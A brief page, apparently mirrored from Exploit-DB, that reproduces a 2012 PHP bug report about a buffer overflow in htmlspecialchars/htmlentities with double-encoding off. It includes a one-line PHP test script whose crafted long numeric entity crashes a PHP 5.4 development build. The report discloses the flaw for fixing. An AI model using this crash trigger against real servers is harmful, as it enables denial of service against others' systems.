PHP 5.4SVN-2012-02-03 – htmlspecialchars/entities Buffer Overflow - 体验盒子

作者： cataphract

日期： 2012-02-03

类别：

dos

平台：

php

来源：https://www.exploit-db.com/exploits/18458/

From: cataphract
Operating system: Any
PHP version:5.4SVN-2012-02-03 (SVN)
Package:Reproducible crash
Bug Type: Bug
Bug description:Buffer overflow on htmlspecialchars/entities with $double=false

Description:
------------
Long entities can cause a buffer overflow because the loop only guarantees
40 bytes available in beginning.

Test script:
---------------
<?php
echo
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
ENT_QUOTES, 'UTF-8', false), "\n";